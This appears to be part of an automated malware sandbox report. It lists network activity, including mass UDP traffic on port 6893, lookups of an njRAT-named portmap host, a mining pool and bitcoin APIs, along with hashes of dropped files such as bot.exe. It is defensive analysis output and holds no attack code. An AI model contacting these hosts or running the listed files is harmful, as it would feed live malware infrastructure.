FR 87.98.177.166:6893 udp
FR 87.98.177.167:6893 udp
FR 87.98.177.168:6893 udp
FR 87.98.177.169:6893 udp
FR 87.98.177.170:6893 udp
FR 87.98.177.171:6893 udp
FR 87.98.177.172:6893 udp
FR 87.98.177.173:6893 udp
FR 87.98.177.174:6893 udp
FR 87.98.177.175:6893 udp
FR 87.98.177.176:6893 udp
FR 87.98.177.177:6893 udp
FR 87.98.177.178:6893 udp
FR 87.98.177.179:6893 udp
FR 87.98.177.180:6893 udp
FR 87.98.177.181:6893 udp
FR 87.98.177.182:6893 udp
FR 87.98.177.183:6893 udp
FR 87.98.177.184:6893 udp
FR 87.98.177.185:6893 udp
FR 87.98.177.186:6893 udp
FR 87.98.177.187:6893 udp
FR 87.98.177.188:6893 udp
FR 87.98.177.189:6893 udp
FR 87.98.177.190:6893 udp
FR 87.98.177.191:6893 udp
FR 87.98.177.192:6893 udp
FR 87.98.177.193:6893 udp
FR 87.98.177.194:6893 udp
FR 87.98.177.195:6893 udp
FR 87.98.177.196:6893 udp
FR 87.98.177.197:6893 udp
FR 87.98.177.198:6893 udp
FR 87.98.177.199:6893 udp
FR 87.98.177.200:6893 udp
FR 87.98.177.201:6893 udp
FR 87.98.177.202:6893 udp
FR 87.98.177.203:6893 udp
FR 87.98.177.204:6893 udp
FR 87.98.177.205:6893 udp
FR 87.98.177.206:6893 udp
FR 87.98.177.207:6893 udp
FR 87.98.177.208:6893 udp
FR 87.98.177.209:6893 udp
FR 87.98.177.210:6893 udp
FR 87.98.177.211:6893 udp
FR 87.98.177.212:6893 udp
FR 87.98.177.213:6893 udp
FR 87.98.177.214:6893 udp
FR 87.98.177.215:6893 udp
FR 87.98.177.216:6893 udp
FR 87.98.177.217:6893 udp
FR 87.98.177.218:6893 udp
FR 87.98.177.219:6893 udp
FR 87.98.177.220:6893 udp
FR 87.98.177.221:6893 udp
FR 87.98.177.222:6893 udp
FR 87.98.177.223:6893 udp
FR 87.98.177.224:6893 udp
FR 87.98.177.225:6893 udp
FR 87.98.177.226:6893 udp
FR 87.98.177.227:6893 udp
FR 87.98.177.228:6893 udp
FR 87.98.177.229:6893 udp
FR 87.98.177.230:6893 udp
FR 87.98.177.231:6893 udp
FR 87.98.177.232:6893 udp
FR 87.98.177.233:6893 udp
FR 87.98.177.234:6893 udp
FR 87.98.177.235:6893 udp
FR 87.98.177.236:6893 udp
FR 87.98.177.237:6893 udp
FR 87.98.177.238:6893 udp
FR 87.98.177.239:6893 udp
FR 87.98.177.240:6893 udp
FR 87.98.177.241:6893 udp
FR 87.98.177.242:6893 udp
FR 87.98.177.243:6893 udp
FR 87.98.177.244:6893 udp
FR 87.98.177.245:6893 udp
FR 87.98.177.246:6893 udp
FR 87.98.177.247:6893 udp
FR 87.98.177.248:6893 udp
FR 87.98.177.249:6893 udp
FR 87.98.177.250:6893 udp
FR 87.98.177.251:6893 udp
FR 87.98.177.252:6893 udp
FR 87.98.177.253:6893 udp
FR 87.98.177.254:6893 udp
FR 87.98.177.255:6893 udp
FR 87.98.178.0:6893 udp
FR 87.98.178.1:6893 udp
FR 87.98.178.2:6893 udp
FR 87.98.178.3:6893 udp
FR 87.98.178.4:6893 udp
FR 87.98.178.5:6893 udp
FR 87.98.178.6:6893 udp
FR 87.98.178.7:6893 udp
FR 87.98.178.8:6893 udp
FR 87.98.178.9:6893 udp
FR 87.98.178.10:6893 udp
FR 87.98.178.11:6893 udp
FR 87.98.178.12:6893 udp
FR 87.98.178.13:6893 udp
FR 87.98.178.14:6893 udp
FR 87.98.178.15:6893 udp
FR 87.98.178.16:6893 udp
FR 87.98.178.17:6893 udp
FR 87.98.178.18:6893 udp
FR 87.98.178.19:6893 udp
FR 87.98.178.20:6893 udp
FR 87.98.178.21:6893 udp
FR 87.98.178.22:6893 udp
FR 87.98.178.23:6893 udp
FR 87.98.178.24:6893 udp
FR 87.98.178.25:6893 udp
FR 87.98.178.26:6893 udp
FR 87.98.178.27:6893 udp
FR 87.98.178.28:6893 udp
FR 87.98.178.29:6893 udp
FR 87.98.178.30:6893 udp
FR 87.98.178.31:6893 udp
FR 87.98.178.32:6893 udp
FR 87.98.178.33:6893 udp
FR 87.98.178.34:6893 udp
FR 87.98.178.35:6893 udp
FR 87.98.178.36:6893 udp
FR 87.98.178.37:6893 udp
FR 87.98.178.38:6893 udp
FR 87.98.178.39:6893 udp
FR 87.98.178.40:6893 udp
FR 87.98.178.41:6893 udp
FR 87.98.178.42:6893 udp
FR 87.98.178.43:6893 udp
FR 87.98.178.44:6893 udp
FR 87.98.178.45:6893 udp
FR 87.98.178.46:6893 udp
FR 87.98.178.47:6893 udp
FR 87.98.178.48:6893 udp
FR 87.98.178.49:6893 udp
FR 87.98.178.50:6893 udp
FR 87.98.178.51:6893 udp
FR 87.98.178.52:6893 udp
FR 87.98.178.53:6893 udp
FR 87.98.178.54:6893 udp
FR 87.98.178.55:6893 udp
FR 87.98.178.56:6893 udp
FR 87.98.178.57:6893 udp
FR 87.98.178.58:6893 udp
FR 87.98.178.59:6893 udp
FR 87.98.178.60:6893 udp
FR 87.98.178.61:6893 udp
FR 87.98.178.62:6893 udp
FR 87.98.178.63:6893 udp
FR 87.98.178.64:6893 udp
FR 87.98.178.65:6893 udp
FR 87.98.178.66:6893 udp
FR 87.98.178.67:6893 udp
FR 87.98.178.68:6893 udp
FR 87.98.178.69:6893 udp
FR 87.98.178.70:6893 udp
FR 87.98.178.71:6893 udp
FR 87.98.178.72:6893 udp
FR 87.98.178.73:6893 udp
FR 87.98.178.74:6893 udp
FR 87.98.178.75:6893 udp
FR 87.98.178.76:6893 udp
FR 87.98.178.77:6893 udp
FR 87.98.178.78:6893 udp
FR 87.98.178.79:6893 udp
FR 87.98.178.80:6893 udp
FR 87.98.178.81:6893 udp
FR 87.98.178.82:6893 udp
FR 87.98.178.83:6893 udp
FR 87.98.178.84:6893 udp
FR 87.98.178.85:6893 udp
FR 87.98.178.86:6893 udp
FR 87.98.178.87:6893 udp
FR 87.98.178.88:6893 udp
FR 87.98.178.89:6893 udp
FR 87.98.178.90:6893 udp
FR 87.98.178.91:6893 udp
FR 87.98.178.92:6893 udp
FR 87.98.178.93:6893 udp
FR 87.98.178.94:6893 udp
FR 87.98.178.95:6893 udp
FR 87.98.178.96:6893 udp
FR 87.98.178.97:6893 udp
FR 87.98.178.98:6893 udp
FR 87.98.178.99:6893 udp
FR 87.98.178.100:6893 udp
FR 87.98.178.101:6893 udp
FR 87.98.178.102:6893 udp
FR 87.98.178.103:6893 udp
FR 87.98.178.104:6893 udp
FR 87.98.178.105:6893 udp
FR 87.98.178.106:6893 udp
FR 87.98.178.107:6893 udp
FR 87.98.178.108:6893 udp
FR 87.98.178.109:6893 udp
FR 87.98.178.110:6893 udp
FR 87.98.178.111:6893 udp
FR 87.98.178.112:6893 udp
FR 87.98.178.113:6893 udp
FR 87.98.178.114:6893 udp
FR 87.98.178.115:6893 udp
FR 87.98.178.116:6893 udp
FR 87.98.178.117:6893 udp
FR 87.98.178.118:6893 udp
FR 87.98.178.119:6893 udp
FR 87.98.178.120:6893 udp
FR 87.98.178.121:6893 udp
FR 87.98.178.122:6893 udp
FR 87.98.178.123:6893 udp
FR 87.98.178.124:6893 udp
FR 87.98.178.125:6893 udp
FR 87.98.178.126:6893 udp
FR 87.98.178.127:6893 udp
FR 87.98.178.128:6893 udp
FR 87.98.178.129:6893 udp
FR 87.98.178.130:6893 udp
FR 87.98.178.131:6893 udp
FR 87.98.178.132:6893 udp
FR 87.98.178.133:6893 udp
FR 87.98.178.134:6893 udp
FR 87.98.178.135:6893 udp
FR 87.98.178.136:6893 udp
FR 87.98.178.137:6893 udp
FR 87.98.178.138:6893 udp
FR 87.98.178.139:6893 udp
FR 87.98.178.140:6893 udp
FR 87.98.178.141:6893 udp
FR 87.98.178.142:6893 udp
FR 87.98.178.143:6893 udp
FR 87.98.178.144:6893 udp
FR 87.98.178.145:6893 udp
FR 87.98.178.146:6893 udp
FR 87.98.178.147:6893 udp
FR 87.98.178.148:6893 udp
FR 87.98.178.149:6893 udp
FR 87.98.178.150:6893 udp
FR 87.98.178.151:6893 udp
FR 87.98.178.152:6893 udp
FR 87.98.178.153:6893 udp
FR 87.98.178.154:6893 udp
FR 87.98.178.155:6893 udp
FR 87.98.178.156:6893 udp
FR 87.98.178.157:6893 udp
FR 87.98.178.158:6893 udp
FR 87.98.178.159:6893 udp
FR 87.98.178.160:6893 udp
FR 87.98.178.161:6893 udp
FR 87.98.178.162:6893 udp
FR 87.98.178.163:6893 udp
FR 87.98.178.164:6893 udp
FR 87.98.178.165:6893 udp
FR 87.98.178.166:6893 udp
FR 87.98.178.167:6893 udp
FR 87.98.178.168:6893 udp
FR 87.98.178.169:6893 udp
FR 87.98.178.170:6893 udp
FR 87.98.178.171:6893 udp
FR 87.98.178.172:6893 udp
FR 87.98.178.173:6893 udp
FR 87.98.178.174:6893 udp
FR 87.98.178.175:6893 udp
FR 87.98.178.176:6893 udp
FR 87.98.178.177:6893 udp
FR 87.98.178.178:6893 udp
FR 87.98.178.179:6893 udp
FR 87.98.178.180:6893 udp
FR 87.98.178.181:6893 udp
FR 87.98.178.182:6893 udp
FR 87.98.178.183:6893 udp
FR 87.98.178.184:6893 udp
FR 87.98.178.185:6893 udp
FR 87.98.178.186:6893 udp
FR 87.98.178.187:6893 udp
FR 87.98.178.188:6893 udp
FR 87.98.178.189:6893 udp
FR 87.98.178.190:6893 udp
FR 87.98.178.191:6893 udp
FR 87.98.178.192:6893 udp
FR 87.98.178.193:6893 udp
FR 87.98.178.194:6893 udp
FR 87.98.178.195:6893 udp
FR 87.98.178.196:6893 udp
FR 87.98.178.197:6893 udp
FR 87.98.178.198:6893 udp
FR 87.98.178.199:6893 udp
FR 87.98.178.200:6893 udp
FR 87.98.178.201:6893 udp
FR 87.98.178.202:6893 udp
FR 87.98.178.203:6893 udp
FR 87.98.178.204:6893 udp
FR 87.98.178.205:6893 udp
FR 87.98.178.206:6893 udp
FR 87.98.178.207:6893 udp
FR 87.98.178.208:6893 udp
FR 87.98.178.209:6893 udp
FR 87.98.178.210:6893 udp
FR 87.98.178.211:6893 udp
FR 87.98.178.212:6893 udp
FR 87.98.178.213:6893 udp
FR 87.98.178.214:6893 udp
FR 87.98.178.215:6893 udp
FR 87.98.178.216:6893 udp
FR 87.98.178.217:6893 udp
FR 87.98.178.218:6893 udp
FR 87.98.178.219:6893 udp
FR 87.98.178.220:6893 udp
FR 87.98.178.221:6893 udp
FR 87.98.178.222:6893 udp
FR 87.98.178.223:6893 udp
FR 87.98.178.224:6893 udp
FR 87.98.178.225:6893 udp
FR 87.98.178.226:6893 udp
FR 87.98.178.227:6893 udp
FR 87.98.178.228:6893 udp
FR 87.98.178.229:6893 udp
FR 87.98.178.230:6893 udp
FR 87.98.178.231:6893 udp
FR 87.98.178.232:6893 udp
FR 87.98.178.233:6893 udp
FR 87.98.178.234:6893 udp
FR 87.98.178.235:6893 udp
FR 87.98.178.236:6893 udp
FR 87.98.178.237:6893 udp
FR 87.98.178.238:6893 udp
FR 87.98.178.239:6893 udp
FR 87.98.178.240:6893 udp
FR 87.98.178.241:6893 udp
FR 87.98.178.242:6893 udp
FR 87.98.178.243:6893 udp
FR 87.98.178.244:6893 udp
FR 87.98.178.245:6893 udp
FR 87.98.178.246:6893 udp
FR 87.98.178.247:6893 udp
FR 87.98.178.248:6893 udp
FR 87.98.178.249:6893 udp
FR 87.98.178.250:6893 udp
FR 87.98.178.251:6893 udp
FR 87.98.178.252:6893 udp
FR 87.98.178.253:6893 udp
FR 87.98.178.254:6893 udp
FR 87.98.178.255:6893 udp
FR 87.98.179.0:6893 udp
FR 87.98.179.1:6893 udp
FR 87.98.179.2:6893 udp
FR 87.98.179.3:6893 udp
FR 87.98.179.4:6893 udp
FR 87.98.179.5:6893 udp
FR 87.98.179.6:6893 udp
FR 87.98.179.7:6893 udp
FR 87.98.179.8:6893 udp
FR 87.98.179.9:6893 udp
FR 87.98.179.10:6893 udp
FR 87.98.179.11:6893 udp
FR 87.98.179.12:6893 udp
FR 87.98.179.13:6893 udp
FR 87.98.179.14:6893 udp
FR 87.98.179.15:6893 udp
FR 87.98.179.16:6893 udp
FR 87.98.179.17:6893 udp
FR 87.98.179.18:6893 udp
FR 87.98.179.19:6893 udp
FR 87.98.179.20:6893 udp
FR 87.98.179.21:6893 udp
FR 87.98.179.22:6893 udp
FR 87.98.179.23:6893 udp
FR 87.98.179.24:6893 udp
FR 87.98.179.25:6893 udp
FR 87.98.179.26:6893 udp
FR 87.98.179.27:6893 udp
FR 87.98.179.28:6893 udp
FR 87.98.179.29:6893 udp
FR 87.98.179.30:6893 udp
FR 87.98.179.31:6893 udp
FR 87.98.179.32:6893 udp
FR 87.98.179.33:6893 udp
FR 87.98.179.34:6893 udp
FR 87.98.179.35:6893 udp
FR 87.98.179.36:6893 udp
FR 87.98.179.37:6893 udp
FR 87.98.179.38:6893 udp
FR 87.98.179.39:6893 udp
FR 87.98.179.40:6893 udp
FR 87.98.179.41:6893 udp
FR 87.98.179.42:6893 udp
FR 87.98.179.43:6893 udp
FR 87.98.179.44:6893 udp
FR 87.98.179.45:6893 udp
FR 87.98.179.46:6893 udp
FR 87.98.179.47:6893 udp
FR 87.98.179.48:6893 udp
FR 87.98.179.49:6893 udp
FR 87.98.179.50:6893 udp
FR 87.98.179.51:6893 udp
FR 87.98.179.52:6893 udp
FR 87.98.179.53:6893 udp
FR 87.98.179.54:6893 udp
FR 87.98.179.55:6893 udp
FR 87.98.179.56:6893 udp
FR 87.98.179.57:6893 udp
FR 87.98.179.58:6893 udp
FR 87.98.179.59:6893 udp
FR 87.98.179.60:6893 udp
FR 87.98.179.61:6893 udp
FR 87.98.179.62:6893 udp
FR 87.98.179.63:6893 udp
FR 87.98.179.64:6893 udp
FR 87.98.179.65:6893 udp
FR 87.98.179.66:6893 udp
FR 87.98.179.67:6893 udp
FR 87.98.179.68:6893 udp
FR 87.98.179.69:6893 udp
FR 87.98.179.70:6893 udp
FR 87.98.179.71:6893 udp
FR 87.98.179.72:6893 udp
FR 87.98.179.73:6893 udp
FR 87.98.179.74:6893 udp
FR 87.98.179.75:6893 udp
FR 87.98.179.76:6893 udp
FR 87.98.179.77:6893 udp
FR 87.98.179.78:6893 udp
FR 87.98.179.79:6893 udp
FR 87.98.179.80:6893 udp
FR 87.98.179.81:6893 udp
FR 87.98.179.82:6893 udp
FR 87.98.179.83:6893 udp
FR 87.98.179.84:6893 udp
FR 87.98.179.85:6893 udp
FR 87.98.179.86:6893 udp
FR 87.98.179.87:6893 udp
FR 87.98.179.88:6893 udp
FR 87.98.179.89:6893 udp
FR 87.98.179.90:6893 udp
FR 87.98.179.91:6893 udp
FR 87.98.179.92:6893 udp
FR 87.98.179.93:6893 udp
FR 87.98.179.94:6893 udp
FR 87.98.179.95:6893 udp
FR 87.98.179.96:6893 udp
FR 87.98.179.97:6893 udp
FR 87.98.179.98:6893 udp
FR 87.98.179.99:6893 udp
FR 87.98.179.100:6893 udp
FR 87.98.179.101:6893 udp
FR 87.98.179.102:6893 udp
FR 87.98.179.103:6893 udp
FR 87.98.179.104:6893 udp
FR 87.98.179.105:6893 udp
FR 87.98.179.106:6893 udp
FR 87.98.179.107:6893 udp
FR 87.98.179.108:6893 udp
FR 87.98.179.109:6893 udp
FR 87.98.179.110:6893 udp
FR 87.98.179.111:6893 udp
FR 87.98.179.112:6893 udp
FR 87.98.179.113:6893 udp
FR 87.98.179.114:6893 udp
FR 87.98.179.115:6893 udp
FR 87.98.179.116:6893 udp
FR 87.98.179.117:6893 udp
FR 87.98.179.118:6893 udp
FR 87.98.179.119:6893 udp
FR 87.98.179.120:6893 udp
FR 87.98.179.121:6893 udp
FR 87.98.179.122:6893 udp
FR 87.98.179.123:6893 udp
FR 87.98.179.124:6893 udp
FR 87.98.179.125:6893 udp
FR 87.98.179.126:6893 udp
FR 87.98.179.127:6893 udp
FR 87.98.179.128:6893 udp
FR 87.98.179.129:6893 udp
FR 87.98.179.130:6893 udp
FR 87.98.179.131:6893 udp
FR 87.98.179.132:6893 udp
FR 87.98.179.133:6893 udp
FR 87.98.179.134:6893 udp
FR 87.98.179.135:6893 udp
FR 87.98.179.136:6893 udp
FR 87.98.179.137:6893 udp
FR 87.98.179.138:6893 udp
FR 87.98.179.139:6893 udp
FR 87.98.179.140:6893 udp
FR 87.98.179.141:6893 udp
FR 87.98.179.142:6893 udp
FR 87.98.179.143:6893 udp
FR 87.98.179.144:6893 udp
FR 87.98.179.145:6893 udp
FR 87.98.179.146:6893 udp
FR 87.98.179.147:6893 udp
FR 87.98.179.148:6893 udp
FR 87.98.179.149:6893 udp
FR 87.98.179.150:6893 udp
FR 87.98.179.151:6893 udp
FR 87.98.179.152:6893 udp
FR 87.98.179.153:6893 udp
FR 87.98.179.154:6893 udp
FR 87.98.179.155:6893 udp
FR 87.98.179.156:6893 udp
FR 87.98.179.157:6893 udp
FR 87.98.179.158:6893 udp
FR 87.98.179.159:6893 udp
FR 87.98.179.160:6893 udp
FR 87.98.179.161:6893 udp
FR 87.98.179.162:6893 udp
FR 87.98.179.163:6893 udp
FR 87.98.179.164:6893 udp
FR 87.98.179.165:6893 udp
FR 87.98.179.166:6893 udp
FR 87.98.179.167:6893 udp
FR 87.98.179.168:6893 udp
FR 87.98.179.169:6893 udp
FR 87.98.179.170:6893 udp
FR 87.98.179.171:6893 udp
FR 87.98.179.172:6893 udp
FR 87.98.179.173:6893 udp
FR 87.98.179.174:6893 udp
FR 87.98.179.175:6893 udp
FR 87.98.179.176:6893 udp
FR 87.98.179.177:6893 udp
FR 87.98.179.178:6893 udp
FR 87.98.179.179:6893 udp
FR 87.98.179.180:6893 udp
FR 87.98.179.181:6893 udp
FR 87.98.179.182:6893 udp
FR 87.98.179.183:6893 udp
FR 87.98.179.184:6893 udp
FR 87.98.179.185:6893 udp
FR 87.98.179.186:6893 udp
FR 87.98.179.187:6893 udp
FR 87.98.179.188:6893 udp
FR 87.98.179.189:6893 udp
FR 87.98.179.190:6893 udp
FR 87.98.179.191:6893 udp
FR 87.98.179.192:6893 udp
FR 87.98.179.193:6893 udp
FR 87.98.179.194:6893 udp
FR 87.98.179.195:6893 udp
FR 87.98.179.196:6893 udp
FR 87.98.179.197:6893 udp
FR 87.98.179.198:6893 udp
FR 87.98.179.199:6893 udp
FR 87.98.179.200:6893 udp
FR 87.98.179.201:6893 udp
FR 87.98.179.202:6893 udp
FR 87.98.179.203:6893 udp
FR 87.98.179.204:6893 udp
FR 87.98.179.205:6893 udp
FR 87.98.179.206:6893 udp
FR 87.98.179.207:6893 udp
FR 87.98.179.208:6893 udp
FR 87.98.179.209:6893 udp
FR 87.98.179.210:6893 udp
FR 87.98.179.211:6893 udp
FR 87.98.179.212:6893 udp
FR 87.98.179.213:6893 udp
FR 87.98.179.214:6893 udp
FR 87.98.179.215:6893 udp
FR 87.98.179.216:6893 udp
FR 87.98.179.217:6893 udp
FR 87.98.179.218:6893 udp
FR 87.98.179.219:6893 udp
FR 87.98.179.220:6893 udp
FR 87.98.179.221:6893 udp
FR 87.98.179.222:6893 udp
FR 87.98.179.223:6893 udp
FR 87.98.179.224:6893 udp
FR 87.98.179.225:6893 udp
FR 87.98.179.226:6893 udp
FR 87.98.179.227:6893 udp
FR 87.98.179.228:6893 udp
FR 87.98.179.229:6893 udp
FR 87.98.179.230:6893 udp
FR 87.98.179.231:6893 udp
FR 87.98.179.232:6893 udp
FR 87.98.179.233:6893 udp
FR 87.98.179.234:6893 udp
FR 87.98.179.235:6893 udp
FR 87.98.179.236:6893 udp
FR 87.98.179.237:6893 udp
FR 87.98.179.238:6893 udp
FR 87.98.179.239:6893 udp
FR 87.98.179.240:6893 udp
FR 87.98.179.241:6893 udp
FR 87.98.179.242:6893 udp
FR 87.98.179.243:6893 udp
FR 87.98.179.244:6893 udp
FR 87.98.179.245:6893 udp
FR 87.98.179.246:6893 udp
FR 87.98.179.247:6893 udp
FR 87.98.179.248:6893 udp
FR 87.98.179.249:6893 udp
FR 87.98.179.250:6893 udp
FR 87.98.179.251:6893 udp
FR 87.98.179.252:6893 udp
FR 87.98.179.253:6893 udp
FR 87.98.179.254:6893 udp
FR 87.98.179.255:6893 udp
US 8.8.8.8:53 zexeq.com udp
BG 95.158.162.200:80 zexeq.com tcp
US 8.8.8.8:53 still.topteamlife.com udp
US 104.21.26.173:443 still.topteamlife.com tcp
RU 185.172.128.53:80 185.172.128.53 tcp
US 8.8.8.8:53 api.bing.com udp
US 8.8.8.8:53 api.blockcypher.com udp
US 104.20.21.251:80 api.blockcypher.com tcp
RU 5.42.64.41:80 5.42.64.41 tcp
US 8.8.8.8:53 btc.blockr.io udp
US 8.8.8.8:53 bitaps.com udp
NL 178.128.255.179:443 bitaps.com tcp
RU 91.218.114.4:80 91.218.114.4 tcp
US 8.8.8.8:53 chain.so udp
RU 91.218.114.4:80 91.218.114.4 tcp
RU 91.218.114.11:80 91.218.114.11 tcp
US 172.67.74.49:443 chain.so tcp
RU 91.218.114.25:80 91.218.114.25 tcp
RU 91.218.114.25:80 91.218.114.25 tcp
RU 91.218.114.26:80 91.218.114.26 tcp
RU 91.218.114.26:80 91.218.114.26 tcp
RU 91.218.114.31:80 tcp
N/A 195.20.16.103:20440 tcp
RU 91.218.114.31:80 tcp
RU 91.218.114.31:80 tcp
RU 91.218.114.32:80 tcp
RU 91.218.114.32:80 tcp
RU 91.218.114.32:80 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
RU 91.218.114.37:80 91.218.114.37 tcp
RU 91.218.114.38:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 whatismyipaddress.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 104.16.154.36:80 whatismyipaddress.com tcp
US 104.16.154.36:443 whatismyipaddress.com tcp
US 104.16.154.36:443 whatismyipaddress.com tcp
RU 91.218.114.38:80 tcp
RU 91.218.114.38:80 tcp
US 193.233.132.62:50500 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.5.15:443 db-ip.com tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.77:80 tcp
US 8.8.8.8:53 files.000webhost.com udp
US 145.14.144.15:21 files.000webhost.com tcp
RU 185.172.128.11:80 185.172.128.11 tcp
RU 91.218.114.77:80 tcp
RU 91.218.114.77:80 tcp
US 8.8.8.8:53 fr-zephyr.miningocean.org udp
BE 188.165.76.243:5342 fr-zephyr.miningocean.org tcp
RU 91.218.114.79:80 tcp
RU 91.218.114.79:80 tcp
RU 91.218.114.79:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat

MD5 6a83b03054f53cb002fdca262b76b102
SHA1 1bbafe19ae5bcdd4f3710f13d06332128a5d54f7
SHA256 7952248cb4ec97bc0d2ab3b51c126c7b0704a7f9d42bddf6adcb04b5657c7a4e
SHA512 fa8d907bb187f32de1cfbe1b092982072632456fd429e4dd92f62e482f2ad23e602cf845a2fd655d0e4b8314c1d7a086dc9545d4d82996afbccb364ddc1e9eae

C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

MD5 2a94f3960c58c6e70826495f76d00b85
SHA1 e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512 fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

MD5 a8b8b90c0cf26514a3882155f72d80bd
SHA1 75679e54563b5e5eacf6c926ac4ead1bcc19344f
SHA256 4fe94f6567af0c38ee6f0f5a05d36286c0607552ea97166a56c4f647e9bf2452
SHA512 88708b20357f1d46957d56d80ac10479cffad72d6bb0268383d360e8904f341c01542b9bbe121b024ef6d6850a1ea4494e077ff124bc9201ae141c46ab1359a4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

MD5 9de535e30ce06b6be5b9ecd5f3153a60
SHA1 59d5069d11fcc190ba25a182f87bb92204c0f4c8
SHA256 22aabc778ac8ecec18b967b14d7445b283f9cc5ea8aa41e3262f23f90cc42f0c
SHA512 f75c89999d65bf8a92036c85976a0e6d7371b86ac534a5677f64fa3a2d83a42995794d6ce03ea552891bb16b19f9ab5e5de80bdfb965c481aaddb81f322d5261

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

MD5 8ce821179732c8cfa5f431c7e28df686
SHA1 909e71f10f8c5b4350cb8c0bfe5778f65c0c56e3
SHA256 e345adc2ab1dc95871b2e930c17745712e567ad040dedd4b28a32a7caa156141
SHA512 fb7a2b12f92126630a57926d089074c30b02d7f6b2ded0969bf5f18ef194ce8c4a496ddf2f327e9d0c9b6b265cae2237b22aa553409df356efd4d1ad3a60161d

\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

MD5 f2ba477f5748de284b93adc43b94324b
SHA1 e0192b0afdae26cd05070e3626da50e0d2065bf8
SHA256 329ea3d3c4806be05493458d1b2d984f1bffee0099fcae4ac2c8382452934550
SHA512 717eabb0ef48f1cbb2373a878a6be0435fff87fd6f7fc9b0f61f456ac02057781d094856e30de0ee42088485156840e3e9583398a4bd8eebf807b1af2e7e0d93

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 e6d4329103f118e853ca0d920a0346e7
SHA1 92aae9cc77903f22d567f1a05cb5cd903fec6293
SHA256 bb9422a96f3af45eb99fdd0847473d215557e993c408c7188e2339546a0edd21
SHA512 36154cb069459348bb659c5c528384ed13f30df91d3aff6fb5232a54e8948f6d29c163dc2d0fbe64b7be3cef5fadd7342b4391f273979c5c3010a357718a6a0d

\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 6d72e648e44af3ec2a2e0c8d508d1112
SHA1 393c2f9b1032ab329f98b81efdceca5349bef36d
SHA256 6895a4449ae1cceb3c84dd8d57a2f1d91b03aa3f8a5a5ef35a5ad046d2c62f7e
SHA512 14d0171be9425519d2f3db56c1265dc33da572789fc847dc71de923fd2ca1cd61b3e12b198bea15cc2a3abbea8efd875771668225e59b349633ae62427a01866

\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 73bbf1497863b6976fc412de4c94d756
SHA1 c483762ba36ba5cfd306eed9edc8940427aba26c
SHA256 af3a5b42c86243c702f158cfc48e1844767eeb8ca79d20696221459d27923d7e
SHA512 8a77c7276d40dd4f7abdbb7957a22e5361304e901ff0fe1e33cd42a40413bc91deff51e6f3527a43d9442ab1030eee14a9d46349b647e5011a96bf2ab6565f39

\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 0afd34eff2acabff5c1c329640aca1c3
SHA1 629625667932013ef0a76a8d7b1a7993b7505b48
SHA256 74c29c324a2fc91104ee6d753eef694c47818feb423f5e4170e7889252988ffb
SHA512 4a7c358571e748a64b1fe0e12a82c15490dccfa90d90329944493a390b1ddca46c966d356628c02ac90ca69469d671b08aa31565a65f7ea483c78699a142bb38

memory/1252-75-0x0000000001D70000-0x0000000001E3E000-memory.dmp

memory/300-99-0x0000000001370000-0x0000000001378000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

MD5 615efb7a8be0f5723462d2a1c1fdf412
SHA1 5bf9cf192411eef6a00986f78a7ee6a07649fea2
SHA256 fd92eac676286d7220b7f349d649eaef330f863e9e306aff36530d14ec7e8e0f
SHA512 23a75d318e142634f6b2bf6d2d895253c74c90a61f97f43dc0ce9debbd835e5a3f9797634644adad157c9ff1f9989fd3185eb86e8e948d739a73dd733d8267fc

\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

MD5 51dbb941d94758799a64beb93263ff8f
SHA1 30598a054f6035ad9c72d9d2f24bffd8ddeae8ca
SHA256 f2c0667204f6baf1d5c8e161e8b93ae2272f524f5d426e41186535508715c67b
SHA512 a41876c75cf25f7e8756152f1fb6294ce2db86a5587619ae76848818311e454dc4bec0d9228d9b327b1e83a4a249957cae334eff119b243c94c081764e20d1e7

memory/300-112-0x0000000072C30000-0x000000007331E000-memory.dmp

memory/2092-114-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1252-127-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/340-126-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/1252-128-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/1252-130-0x0000000000400000-0x00000000005DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

MD5 89f3ce808da63b8b13ce56137a779960
SHA1 0f0b7115802d03137e40ee8c767755fc6c5f68d5
SHA256 b61a4e50fde985eaaffd6c8917ff3fe571f0e35af9d2a6fc5e62f049e7d7012b
